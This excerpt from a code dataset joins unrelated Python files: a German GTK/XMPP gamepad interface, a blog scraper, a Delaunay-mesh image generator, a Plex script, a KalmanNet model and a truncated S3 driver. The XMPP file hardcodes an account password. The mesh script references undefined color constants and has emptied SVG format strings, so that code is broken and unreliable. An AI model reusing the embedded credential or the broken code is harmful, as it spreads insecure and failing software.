weil beim Gamepad kein GTK-Button gedrückt wurde, dieser jedoch aufgrund des Button-Eventlisteners ein Parameter ist\n\n\t\telif not dispMenu:\n\t\t\tif data2 == \"start\" and not dispOverlay:\n\t\t\t\tself.dispOverlay(True)\n\t\t\telif data2 == \"grun\" and dispOverlay:\n\t\t\t\tself.dispOverlay(False)\n\t\t\telif data2 == \"rot\" and dispOverlay:\n\t\t\t\tself.dispMenu()\n\n\n\t\"\"\"\n\tVerbindung zu Cyborgs herstellen oder abbrechen\n\t\"\"\"\n\n\tdef connectCyborg(self, cyborg):\n\t\tglobal gpXMPP, isConnected, connectedTo\n\t\txmppResponse = {}\n\t\t#Es steht schon eine Verbindung, keine neue herstellen\n\t\tif isConnected:\n\t\t\txmppResponse[\"action\"] = \"stillConnected\"\n\t\t\txmppResponse[\"value\"] = connectedTo\n\t\t#Es steht noch keine Verbindung, herstellen!\n\t\telse:\n\t\t\t#Neuer Room für Gamepad-Chat\n\t\t\tgpXMPP = xmppWrapper(\"ice@ice.midi.xyz\", \"me_like!\", \"%s@conference.ice.midi.xyz\" % rolle, \"ice\")\n\t\t\t#Auf XMPP-Verbindung warten\n\t\t\twhile not gpXMPP.ready:\n\t\t\t\tpass\n\t\t\t#globale Variabeln anpassen\n\t\t\tisConnected = True\n\t\t\tconnectedTo = cyborg\n\t\t\t#TODO: VLC-Streams hier aufbauen\n\t\t\t#TODO: irgendeine GTK-Feedback-Message einbauen\n\t\t\t#Ready-Mitteilung an Cyborg\n\t\t\txmppResponse[\"action\"] = \"ready\"\n\t\t#Rückmeldung abschicken\n\t\txmppResponse[\"sender\"] = rolle\n\t\txmppResponse[\"receiver\"] = cyborg\n\t\tself.ctrlXMPP.send(json.dumps(xmppResponse))\n\n\n\tdef disconnectCyborg(self, setResponse):\n\t\tglobal gpXMPP, isConnected, connectedTo\n\t\tif setResponse:\n\t\t\txmppResponse = {}\n\t\t\txmppResponse[\"sender\"] = rolle\n\t\t\txmppResponse[\"receiver\"] = connectedTo\n\t\t\txmppResponse[\"action\"] = \"disconnect\"\n\t\t\tself.ctrlXMPP.send(json.dumps(xmppResponse))\n\t\tif gpXMPP is not None:\n\t\t\tgpXMPP.cutConnection()\n\t\t\tgpXMPP = None\n\t\t#TODO: VLC-Streams hier abbrechen\n\t\t#TODO: irgendein Feedback\n\t\tisConnected = False\n\t\tconnectedTo = None\n\n\n\t\"\"\"\n\tGrafische Funktionen, Steuerung der Menuführung\n\t\"\"\"\n\t#Das Markieren der Buttons. CSS-Klassen entfernen und anhängen, nur optisch für Menuführung relevant\n\tdef markBtn(self, whichBtn):\n\t\tfor btn in self.btnList:\n\t\t\tctx = btn.get_style_context()\n\t\t\tctx.remove_class(\"marked\")\n\t\tctx = self.btnList[whichBtn].get_style_context()\n\t\tctx.add_class(\"marked\")\n\n\n\t#Client Interface ausblenden, Menu anzeigen, Verbindung abbrechen\n\tdef dispMenu(self):\n\t\tglobal rolle, dispMenu, dispOverlay\n\t\tself.disconnectCyborg(setResponse=True)\n\t\t#globale Variabeln umdefinieren\n\t\trolle = None\n\t\tdispMenu = True\n\t\tdispOverlay = False\n\t\tself.ifTestLabel.hide()\n\t\tself.ifOverlay.hide()\n\t\tfor btn in self.btnList:\n\t\t\tbtn.show()\n\n\n\t#Menu ausblenden, Client Interface anzeigen\n\tdef dispIF(self, button, setRolle):\n\t\tglobal rolle, dispMenu\n\t\trolle = setRolle\n\t\tprint(\"Rolle gewählt: %s\" % rolle)\n\t\tdispMenu = False\n\t\tfor btn in self.btnList:\n\t\t\tbtn.hide()\n\t\tself.ifTestLabel.show()\n\n\n\t#Quit Overlay anzeigen\n\tdef dispOverlay(self, setOverlay):\n\t\tglobal dispOverlay\n\t\tif setOverlay:\n\t\t\tdispOverlay = True\n\t\t\tself.ifOverlay.show()\n\t\telse:\n\t\t\tdispOverlay = False\n\t\t\tself.ifOverlay.hide()\n\n\n\tdef on_close_clicked(self, button):\n\t\tself.disconnectCyborg(setResponse=True)\n\t\tprint(\"Closing application\")\n\t\tGtk.main_quit()\n\n\n\n\"\"\"\nCSS-File integrieren\n\"\"\"\ncssProvider = Gtk.CssProvider()\ncssProvider.load_from_path('interfaceCSS.css')\nscreen = Gdk.Screen.get_default()\nstyleContext = Gtk.StyleContext()\nstyleContext.add_provider_for_screen(screen, cssProvider, Gtk.STYLE_PROVIDER_PRIORITY_USER)\n\n\n\"\"\"\nGTK-Applikation starten\n\"\"\"\nwin = ButtonWindow()\nwin.connect(\"delete-event\", Gtk.main_quit)\nwin.show_all()\nwin.dispMenu()\nGtk.main()\n","sub_path":"vorarbeit/interfaceAndXMPP/interfaceAndXMPP2.py","file_name":"interfaceAndXMPP2.py","file_ext":"py","file_size_in_byte":13123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"400723554","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl='https://blog.csdn.net/qq_40693171'\nreq=requests.get(url)\nres=req.text#html 源码\nsoup=BeautifulSoup(res,'lxml')#转为bea--对象\nnode=soup.find(id='mainBox').find_all(attrs={'class':'article-item-box'})\n#print(node[1])\nfor link in node:\n value=link.h4\n print(value.text)\n\n","sub_path":"爬虫/Include/csdn/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"220531837","text":"#!/usr/bin/python\nimport logging\nfrom PIL import Image, ImageDraw\nimport random\nimport sys\nimport numpy as np\nimport math\nfrom scipy.spatial import Delaunay\n\n\nFGTHEMES = [\"fire.png\",\"ice.png\",\"darkgreen.png\",\"lightgreen.png\"]\n\nBGTHEMES = [\"black_bg.png\", \"white_bg.png\"]\n\n\ndef printUsage():\n\texit(\"Usage: [overlay]\")\n\ntry:\n\tif sys.argv[1] is None:\n\t\tprintUsage()\n\tif sys.argv[2] is None:\n\t\tprintUsage()\n\tif sys.argv[3] is None:\n\t\tprintUsage()\n\nexcept IndexError:\n\tprintUsage()\n\nFORMAT = \"%(asctime)-15s %(levelname)s %(message)s\"\nlogging.basicConfig(format=FORMAT, level=logging.INFO)\nlogger = logging.getLogger(\"main\")\nlogger.info(\"Starting!\")\n\nOUTPUTIMAGE = sys.argv[1]\nIN = Image.open(sys.argv[2])\nINPUTIMAGE = IN.load()\n(SIZEX, SIZEY) = IN.size\nif(SIZEX != SIZEY):\n\tlogger.error(\"Quadratisches Bild bitte!\")\n\texit(1)\nSIZE = SIZEY\nDOTS = int(sys.argv[3])\nOVERLAY = None\nOVERLAYIMAGE = None\nCOLORINDEX = 3\nFG = 1\nBG = 2\ntry:\n\tif sys.argv[4]:\n\t\tlogger.info(\"Use overlay\")\n\t\tOVERLAY = Image.open(sys.argv[4])\n\t\tOVERLAYIMAGE = OVERLAY.load()\n\t\t(w,h) = OVERLAY.size\n\t\tif w != SIZE or h != size:\n\t\t\tlogger.error(\"Die Masse des Overlays muessen dem des Inputbildes entsprechen. %d x %d pixel\" % (SIZE,SIZE))\n\t\t\texit(1)\nexcept:\n\tpass\n\nLINEWIDTH = 0\n\ndef generateDots(ndots,size):\n\n\t#for i in range(0,DOTS):\n\t#\tdots.append((int(random.random() * WIDTH), int(random.random() * HEIGHT)))\n\tdots = np.random.randint(1, size-1, (ndots+4, 2))\n\tdots[0] = [0,0]\n\tdots[1] = [size-1,0]\n\tdots[2] = [0,size-1]\n\tdots[3] = [size-1,size-1]\n\n\ttris = Delaunay(dots)\n\n\treturn (dots,tris)\n\ndef setColor(fgcolor):\n\tif fgcolor is FGCOLOR_RED:\n\t\tc1 = 0 + int(random.random() * 255)\n\t\tc2 = 0 + int(random.random() * 30)\n\t\tc3 = 0 + int(random.random() * 30)\n\n\telif fgcolor is FGCOLOR_FIRE:\n\t\tif int(random.random() < 0.8):\n\t\t\tc1 = 255\n\t\t\tc2 = 40 + int(random.random() * 180)\n\t\t\tc3 = 0 + int(random.random() * 30)\n\t\telse:\n\t\t\tc1 = 209\n\t\t\tc2 = 0\n\t\t\tc3 = 0\n\n\telif fgcolor is FGCOLOR_GREEN:\n\t\tc1 = 200 - int(random.random() * 150)\n\t\tc2 = 255 - int(random.random() * 20)\n\t\tc3 = 60 + int(random.random() * 40)\n\n\telif fgcolor is FGCOLOR_BLUE:\n\t\tc1 = 2 + int(random.random() * 20)\n\t\tc2 = 170 + int(random.random() * 85)\n\t\tc3 = 210 + int(random.random() * 40)\n\n\telif fgcolor is FGCOLOR_DGREEN:\n\t\tc1 = 200 - int(random.random() * 150)\n\t\tc2 = 255 - int(random.random() * 20)\n\t\tc3 = 60 + int(random.random() * 40)\n\n\telif fgcolor is FGCOLOR_DBLUE:\n\t\tc1 = 2 + int(random.random() * 20)\n\t\tc2 = 10 + int(random.random() * 150)\n\t\tc3 = 210 + int(random.random() * 40)\n\t\t#c1 = 90 + int(random.random() * 50)\n\t\t#c2 = c1\n\t\t#c3 = c1\n\n\treturn (c1,c2,c3)\n\ndef setBW(bgcolor):\n\tif bgcolor is BGCOLOR_WHITE:\n\t\tc1 = 255 - int(random.random() * 50)\n\t\tc2 = c1\n\t\tc3 = c1\n\telse:\n\t\tc1 = int(random.random() * 50)\n\t\tc2 = c1\n\t\tc3 = c1\n\t\t#c1 = 2 + int(random.random() * 20)\n\t\t#c2 = 10 + int(random.random() * 150)\n\t\t#c3 = 210 + int(random.random() * 40)\n\n\n\treturn (c1,c2,c3)\n\ndef buildMesh( inImage, tris, dots):\n\tnewTris = []\n\n\tfor simplex in tris.simplices:\n\t\tx = np.average([int(dots[simplex[0]][0]),int(dots[simplex[1]][0]),int(dots[simplex[2]][0])])\n\t\ty = np.average([int(dots[simplex[0]][1]),int(dots[simplex[1]][1]),int(dots[simplex[2]][1])])\n\n\t\t(color1, color2, color3, alpha) = inImage[x,y]\n\t\tif int(random.random() * 255 ) >= color1:\n\t\t\tsimplex = np.append(simplex,FG)\n\t\telse:\n\t\t\tsimplex = np.append(simplex,BG)\n\t\tnewTris.append([simplex[0], simplex[1], simplex[2], simplex[3]])\n\treturn (dots,newTris)\n\n\ndef exportPic(outImage, tris, dots, fgcolor, bgcolor, size, monobg = False, overlayImage = None, lineWidth=0):\n\tcanvas = (SIZE,SIZE)\n\tsvgGrad = \"\"\n\tsvgPoly = \"\"\n\n\tgradient = 0\n\n\tif bgcolor is BGCOLOR_WHITE:\n\t\tim = Image.new('RGB', canvas, (255,255,255,255))\n\telse:\n\t\tim = Image.new('RGB', canvas, (0,0,0,255))\n\tdraw = ImageDraw.Draw(im, 'RGBA')\n\n\tfor simplex in tris:\n\t\t#idx = np.argmin([int(dots[simplex[0]][0]),int(dots[simplex[1]][0]),int(dots[simplex[2]][0])])\n\t\tx = np.average([int(dots[simplex[0]][0]),int(dots[simplex[1]][0]),int(dots[simplex[2]][0])])\n\t\ty = np.average([int(dots[simplex[0]][1]),int(dots[simplex[1]][1]),int(dots[simplex[2]][1])])\n\n\t\tprint(simplex)\n\t\tif simplex[COLORINDEX] == FG:\n\t\t\t(c1,c2,c3) = setColor(fgcolor)\n\t\t\tdraw.polygon([dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[1]][0],dots[simplex[1]][1],dots[simplex[2]][0],dots[simplex[2]][1]], fill=(c1,c2,c3,255))\n\n\t\t\tp = 1.01\n\t\t\tgrad = \"\\n\\n\" % (c1,c2,c3, int(c1*p),int(c1*p),int(c1*p))\n\t\t\tsvgGrad = svgGrad + grad\n\n\t\t\t#svgPoly = svgPoly + \"\\n\" % (dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[1]][0],dots[simplex[1]][1],dots[simplex[2]][0],dots[simplex[2]][1],c1,c2,c3)\n\t\t\tsvgPoly = svgPoly + \"\\n\" % (dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[1]][0],dots[simplex[1]][1],dots[simplex[2]][0],dots[simplex[2]][1],gradient)\n\t\t\tgradient = gradient + 1\n\t\telse:\n\t\t\t(c1,c2,c3) = setBW(bgcolor)\n\t\t\t# Drawing the bg parts only when not in monobg mode\n\t\t\tif not monobg:\n\t\t\t\tdraw.polygon([dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[1]][0],dots[simplex[1]][1],dots[simplex[2]][0],dots[simplex[2]][1]], fill=(c1,c2,c3,255))\n\n\t\t\t\tp = 1.01\n\t\t\t\tgrad = \"\\n\\n\" % (c1,c2,c3, int(c1*p),int(c1*p),int(c1*p))\n\t\t\t\tsvgGrad = svgGrad + grad\n\t\t\t\t#svgPoly = svgPoly + \"\\n\" % (dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[1]][0],dots[simplex[1]][1],dots[simplex[2]][0],dots[simplex[2]][1],c1,c2,c3)\n\t\t\t\tsvgPoly = svgPoly + \"\\n\" % (dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[1]][0],dots[simplex[1]][1],dots[simplex[2]][0],dots[simplex[2]][1],gradient)\n\t\t\t\tgradient = gradient + 1\n\n\n\t\t# DRAWING the gaps\n\t\tif bgcolor is BGCOLOR_BLACK:\n\t\t\tc = (0,0,0,255)\n\t\telse:\n\t\t\tc = (230,230,230,255)\n\n\t\tw = lineWidth\n\t\tif w != 0:\n\t\t\tdraw.line([dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[1]][0],dots[simplex[1]][1]], width=w, fill=c)\n\t\t\tdraw.line([dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[2]][0],dots[simplex[2]][1]], width=w, fill=c)\n\t\t\tdraw.line([dots[simplex[2]][0],dots[simplex[2]][1],dots[simplex[1]][0],dots[simplex[1]][1]], width=w, fill=c)\n\n\tif overlayImage is not None:\n\t\tim.paste(overlayImage, (0,0), overlayImage)\n\tim.save(outImage)\n\tsvg = \"\\n\" + \"\\n\" + svgGrad + \"\\n\" + svgPoly + \"\"\n\tf = open(\"test.svg\", \"w\")\n\tf.write(svg)\n\n# MAIN\nif __name__ == \"__main__\":\n\ttry:\n\t\t(dots,tris) = generateDots(DOTS, SIZE)\n\t\t(dots,tris) = buildMesh(INPUTIMAGE,tris, dots)\n\n\t\texportPic(OUTPUTIMAGE + \"_red_black.png\", tris, dots, FGCOLOR_RED, BGCOLOR_BLACK, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_fire_black.png\", tris, dots, FGCOLOR_FIRE, BGCOLOR_BLACK, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_red_white.png\", tris, dots, FGCOLOR_RED, BGCOLOR_WHITE, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_fire_white.png\", tris, dots, FGCOLOR_FIRE, BGCOLOR_WHITE, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\n\t\texportPic(OUTPUTIMAGE + \"_green_black.png\", tris, dots, FGCOLOR_GREEN, BGCOLOR_BLACK, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_blue_black.png\", tris, dots, FGCOLOR_BLUE, BGCOLOR_BLACK, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_green_white.png\", tris, dots, FGCOLOR_GREEN, BGCOLOR_WHITE, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_blue_white.png\", tris, dots, FGCOLOR_BLUE, BGCOLOR_WHITE, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\n\t\texportPic(OUTPUTIMAGE + \"_dgreen_black.png\", tris, dots, FGCOLOR_DGREEN, BGCOLOR_BLACK, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_dblue_black.png\", tris, dots, FGCOLOR_DBLUE, BGCOLOR_BLACK, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_dgreen_white.png\", tris, dots, FGCOLOR_DGREEN, BGCOLOR_WHITE, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_dblue_white.png\", tris, dots, FGCOLOR_DBLUE, BGCOLOR_WHITE, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\n\t\t#exportPic(OUTPUTIMAGE + \"_red_black_monobg.png\", tris, dots, FGCOLOR_RED, BGCOLOR_BLACK, SIZE, monobg = True, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\t#exportPic(OUTPUTIMAGE + \"_fire_black_monobg.png\", tris, dots, FGCOLOR_FIRE, BGCOLOR_BLACK, SIZE, monobg = True, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\t#exportPic(OUTPUTIMAGE + \"_red_white_monobg.png\", tris, dots, FGCOLOR_RED, BGCOLOR_WHITE, SIZE, monobg = True, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\t#exportPic(OUTPUTIMAGE + \"_fire_white_monobg.png\", tris, dots, FGCOLOR_FIRE, BGCOLOR_WHITE, SIZE, monobg = True, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\n\texcept KeyboardInterrupt as e:\n\t\tlogger.warning(\"Received KeyboardInterrupt! Terminating\")\n\t\texit(0)\n","sub_path":"trimesh_oldcolors.py","file_name":"trimesh_oldcolors.py","file_ext":"py","file_size_in_byte":9623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"316136099","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nPlex-MarkWatched is a useful to always mark a show as watched. This comes in\nhandy when you have a show you keep downloaded, but do not religiously watch\nevery single episode that is downloaded. By marking everything watched, it\nwill keep the show out of your OnDeck list inside Plex.\n\nUsage:\nIntended usage is to add the tak 'markwatched' to any show you want to have\nthis behaviour. Then simply add this script to run on a schedule and you\nshould be all set.\n\"\"\"\nfrom plexapi.server import PlexServer\n\n\nif __name__ == '__main__':\n plex = PlexServer()\n for section in plex.library.sections():\n if section.type in ('movie', 'artist', 'show'):\n for item in section.search(collection='markwatched'):\n print('Marking %s watched.' % item.title)\n item.watched()\n","sub_path":"tools/plex-markwatched.py","file_name":"plex-markwatched.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"294063011","text":"\"\"\"# **Class: KalmanNet**\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as func\n\nfrom filing_paths import path_model\n\nimport sys\nsys.path.insert(1, path_model)\nfrom model import getJacobian\n\nnGRU = 2\n\nclass KalmanNetNN(torch.nn.Module):\n\n ###################\n ### Constructor ###\n ###################\n def __init__(self):\n super().__init__()\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n ######################################\n ### Initialize Kalman Gain Network ###\n ######################################\n\n def Build(self, ssModel, infoString = 'fullInfo'):\n\n self.InitSystemDynamics(ssModel.f, ssModel.h, ssModel.m, ssModel.n, infoString = 'fullInfo')\n self.InitSequence(ssModel.m1x_0, ssModel.T)\n\n # Number of neurons in the 1st hidden layer\n H1_KNet = (ssModel.m + ssModel.n) * (10) * 8\n\n # Number of neurons in the 2nd hidden layer\n H2_KNet = (ssModel.m * ssModel.n) * 1 * (4)\n\n self.InitKGainNet(H1_KNet, H2_KNet)\n\n\n\n def InitKGainNet(self, H1, H2):\n\n # Input Dimensions (+1 for time input)\n D_in = self.m + self.m + self.n # F1,3,4\n\n # Output Dimensions\n D_out = self.m * self.n; # Kalman Gain\n\n ###################\n ### Input Layer ###\n ###################\n # Linear Layer\n self.KG_l1 = torch.nn.Linear(D_in, H1, bias=True)\n\n # ReLU (Rectified Linear Unit) Activation Function\n self.KG_relu1 = torch.nn.ReLU()\n\n ###########\n ### GRU ###\n ###########\n # Input Dimension\n self.input_dim = H1\n # Hidden Dimension\n self.hidden_dim = ((self.n * self.n) + (self.m * self.m)) * 10 * 1\n # Number of Layers\n self.n_layers = nGRU\n # Batch Size\n self.batch_size = 1\n # Input Sequence Length\n self.seq_len_input = 1\n # Hidden Sequence Length\n self.seq_len_hidden = self.n_layers\n\n # batch_first = False\n # dropout = 0.1 ;\n\n # Initialize a Tensor for GRU Input\n # self.GRU_in = torch.empty(self.seq_len_input, self.batch_size, self.input_dim)\n\n # Initialize a Tensor for Hidden State\n self.hn = torch.randn(self.seq_len_hidden, self.batch_size, self.hidden_dim)\n\n # Iniatialize GRU Layer\n self.rnn_GRU = nn.GRU(self.input_dim, self.hidden_dim, self.n_layers)\n\n ####################\n ### Hidden Layer ###\n ####################\n self.KG_l2 = torch.nn.Linear(self.hidden_dim, H2, bias=True)\n\n # ReLU (Rectified Linear Unit) Activation Function\n self.KG_relu2 = torch.nn.ReLU()\n\n ####################\n ### Output Layer ###\n ####################\n self.KG_l3 = torch.nn.Linear(H2, D_out, bias=True)\n\n ##################################\n ### Initialize System Dynamics ###\n ##################################\n def InitSystemDynamics(self, f, h, m, n, infoString = 'fullInfo'):\n \n if(infoString == 'partialInfo'):\n self.fString ='ModInacc'\n self.hString ='ObsInacc'\n else:\n self.fString ='ModAcc'\n self.hString ='ObsAcc'\n \n # Set State Evolution Function\n self.f = f\n self.m = m\n\n # Set Observation Function\n self.h = h\n self.n = n\n\n ###########################\n ### Initialize Sequence ###\n ###########################\n def InitSequence(self, M1_0, T):\n\n self.m1x_posterior = torch.squeeze(M1_0)\n self.m1x_posterior_previous = 0 # for t=0\n\n self.T = T\n self.x_out = torch.empty(self.m, T)\n\n self.state_process_posterior_0 = torch.squeeze(M1_0)\n self.m1x_prior_previous = self.m1x_posterior\n\n # KGain saving\n self.i = 0\n self.KGain_array = self.KG_array = torch.zeros((self.T,self.m,self.n))\n\n ######################\n ### Compute Priors ###\n ######################\n def step_prior(self):\n # Predict the 1-st moment of x\n self.m1x_prior = torch.squeeze(self.f(self.m1x_posterior))\n\n # Predict the 1-st moment of y\n self.m1y = torch.squeeze(self.h(self.m1x_prior))\n\n # Update Jacobians\n #self.JFt = get_Jacobian(self.m1x_posterior, self.fString)\n #self.JHt = get_Jacobian(self.m1x_prior, self.hString)\n\n self.state_process_prior_0 = torch.squeeze(self.f(self.state_process_posterior_0))\n self.obs_process_0 = torch.squeeze(self.h(self.state_process_prior_0))\n\n ##############################\n ### Kalman Gain Estimation ###\n ##############################\n def step_KGain_est(self, y):\n # Feature 1: yt - yt-1\n try:\n my_f1_0 = y - torch.squeeze(self.y_previous)\n except:\n my_f1_0 = y - torch.squeeze(self.obs_process_0) # when t=0 \n # my_f1_reshape = torch.squeeze(my_f1_0) \n y_f1_norm = func.normalize(my_f1_0, p=2, dim=0, eps=1e-12, out=None)\n\n # Feature 2: yt - y_t+1|t\n # my_f2_0 = y - torch.squeeze(self.m1y)\n # my_f2_reshape = torch.squeeze(my_f2_0) \n # y_f2_norm = func.normalize(my_f2_reshape, p=2, dim=0, eps=1e-12, out=None)\n\n # Feature 3: x_t|t - x_t-1|t-1\n m1x_f3_0 = self.m1x_posterior - self.m1x_posterior_previous\n m1x_f3_reshape = torch.squeeze(m1x_f3_0)\n m1x_f3_norm = func.normalize(m1x_f3_reshape, p=2, dim=0, eps=1e-12, out=None)\n\n # Reshape and Normalize m1x Posterior\n #m1x_post_0 = self.m1x_posterior - self.state_process_posterior_0 # Option 1\n\n # Featture 4: x_t|t - x_t|t-1\n m1x_f4_0 = self.m1x_posterior - self.m1x_prior_previous \n #m1x_reshape = torch.squeeze(self.m1x_posterior) # Option 3\n m1x_f4_reshape = torch.squeeze(m1x_f4_0)\n m1x_f4_norm = func.normalize(m1x_f4_reshape, p=2, dim=0, eps=1e-12, out=None)\n\n # Normalize y\n #my_0 = y - torch.squeeze(self.obs_process_0) # Option 1\n #my_0 = y - torch.squeeze(self.m1y) # Option 2\n # my_0 = y\n # y_norm = func.normalize(my_0, p=2, dim=0, eps=1e-12, out=None)\n #y_norm = func.normalize(y, p=2, dim=0, eps=1e-12, out=None);\n\n # Input for counting\n count_norm = func.normalize(torch.tensor([self.i]).float(),dim=0, eps=1e-12,out=None)\n\n # KGain Net Input\n KGainNet_in = torch.cat([y_f1_norm,m1x_f3_norm,m1x_f4_norm], dim=0)\n\n # Kalman Gain Network Step\n KG = self.KGain_step(KGainNet_in)\n\n # Reshape Kalman Gain to a Matrix\n self.KGain = torch.reshape(KG, (self.m, self.n))\n\n #######################\n ### Kalman Net Step ###\n #######################\n def KNet_step(self, y):\n # Compute Priors\n self.step_prior()\n\n # Compute Kalman Gain\n self.step_KGain_est(y)\n\n # Save KGain in array\n self.KGain_array[self.i] = self.KGain\n self.i += 1\n\n # Innovation\n # y_obs = torch.unsqueeze(y, 1)\n dy = y - self.m1y\n\n # Compute the 1-st posterior moment\n INOV = torch.matmul(self.KGain, dy)\n self.m1x_posterior_previous = self.m1x_posterior\n self.m1x_posterior = self.m1x_prior + INOV\n\n self.state_process_posterior_0 = self.state_process_prior_0\n self.m1x_prior_previous = self.m1x_prior\n self.y_previous = y\n\n # return\n return torch.squeeze(self.m1x_posterior)\n\n ########################\n ### Kalman Gain Step ###\n ########################\n def KGain_step(self, KGainNet_in):\n\n ###################\n ### Input Layer ###\n ###################\n L1_out = self.KG_l1(KGainNet_in)\n La1_out = self.KG_relu1(L1_out)\n\n ###########\n ### GRU ###\n ###########\n GRU_in = torch.empty(self.seq_len_input, self.batch_size, self.input_dim)\n GRU_in[0, 0, :] = La1_out\n GRU_out, self.hn = self.rnn_GRU(GRU_in, self.hn)\n GRU_out_reshape = torch.reshape(GRU_out, (1, self.hidden_dim))\n\n ####################\n ### Hidden Layer ###\n ####################\n L2_out = self.KG_l2(GRU_out_reshape)\n La2_out = self.KG_relu2(L2_out)\n\n ####################\n ### Output Layer ###\n ####################\n L3_out = self.KG_l3(La2_out)\n return L3_out\n\n ###############\n ### Forward ###\n ###############\n def forward(self, y):\n yt = torch.squeeze(y)\n '''\n for t in range(0, self.T):\n self.x_out[:, t] = self.KNet_step(y[:, t])\n '''\n self.x_out = self.KNet_step(yt)\n\n return self.x_out\n\n #########################\n ### Init Hidden State ###\n #########################\n def init_hidden(self):\n weight = next(self.parameters()).data\n hidden = weight.new(self.n_layers, self.batch_size, self.hidden_dim).zero_()\n self.hn = hidden.data","sub_path":"Extended_KalmanNet_nn.py","file_name":"Extended_KalmanNet_nn.py","file_ext":"py","file_size_in_byte":8962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"486451764","text":"import logging\nimport re\nimport boto\nimport boto.s3\nfrom boto.s3.key import Key\nfrom boto.s3.connection import OrdinaryCallingFormat\nfrom basedriver import BaseDriver\nfrom artifactcli.util import assert_type, ProgressBar\n\nDEFAULT_REGION = 'us-east-1'\nDEFAULT_INDEX_PREFIX = '.meta/index-'\n\n\nclass S3Driver(BaseDriver):\n \"\"\"\n S3 driver class\n \"\"\"\n\n def __init__(self, aws_access_key, aws_secret_key, bucket_name, group_id,\n region=None, index_prefix=None, connection=None):\n super(S3Driver, self).__init__(['aws_access_key', 'bucket_name', 'region', 'index_prefix'])\n self.aws_access_key = aws_access_key\n self.aws_secret_key = aws_secret_key\n self.bucket_name = bucket_name\n self.region = region or DEFAULT_REGION\n self.index_prefix = '%s/%s' % (group_id, index_prefix or DEFAULT_INDEX_PREFIX)\n self.__conn = connection\n self.__bucket = None\n\n def connect(self):\n self.__conn = self.__conn or boto.s3.connect_to_region(\n self.region,\n aws_access_key_id=self.aws_access_key,\n aws_secret_access_key=self.aws_secret_key,\n is_secure=True)\n self.__bucket = self.__conn.get_bucket(self.bucket_name)\n\n def bucket(self):\n if not self.__bucket:\n self.connect()\n return self.__bucket\n\n def index_path(self, artifact_id):\n return '%s%s.json' % (self.index_prefix, artifact_id)\n\n def artifact_ids(self):\n \"\"\"\n Get list of the artifact IDs in the directory\n\n :return: sorted list of artifact IDs\n \"\"\"\n keys = [k.name[len(self.index_prefix):] for k in self.bucket().list(prefix=self.index_prefix)]\n results = [re.search('(.*)[.]json', k) for k in keys]\n return sorted(r.group(1) for r in results if r)\n\n def read_index(self, artifact_id):\n \"\"\"\n Read index data from S3 bucket.\n\n :param artifact_id: artifact id to read\n :return: index json text in unicode\n \"\"\"\n index_path = self.index_path(artifact_id)\n logging.debug('Reading index: %s' % self.s3_url(self.bucket_name, index_path))\n k = self.bucket().get_key(index_path)\n if k:\n s = k.get_contents_as_string(encoding='utf-8')\n else:\n s = unicode()\n\n return assert_type(s, unicode)\n\n def write_index(self, artifact_id, s):\n \"\"\"\n Write index data to S3 bucket.\n\n :param artifact_id: artifact id to write\n :param s: index json text in unicode\n :return: None\n \"\"\"\n assert_type(s, unicode)\n\n index_path = self.index_path(artifact_id)\n logging.debug('Writing index: %s' % self.s3_url(self.bucket_name, index_path))\n k = Key(self.bucket())\n k.key = index_path\n k.set_metadata('Content-Type', 'application/json; charset=utf-8')\n k.set_contents_from_string(s.encode('utf-8'))\n\n def upload(self, local_path, remote_path, md5):\n \"\"\"\n Upload local file to S3 bucket.\n File will be overwritten when already exists.\n\n :param local_path: source file path\n :param remote_path: S3 path to upload\n :param md5: MD5 digest hex string to verify\n :return None\n \"\"\"\n k = Key(self.bucket())\n k.key = remote_path\n\n with ProgressBar():\n k.set_contents_from_filename(local_path)\n\n remote_md5 = self.bucket().get_key(remote_path).etag.strip('\"')\n assert md5 is None or md5 == remote_md5, \\\n 'Failed to check MD5 digest: local=%s, remote=%s' % (md5, 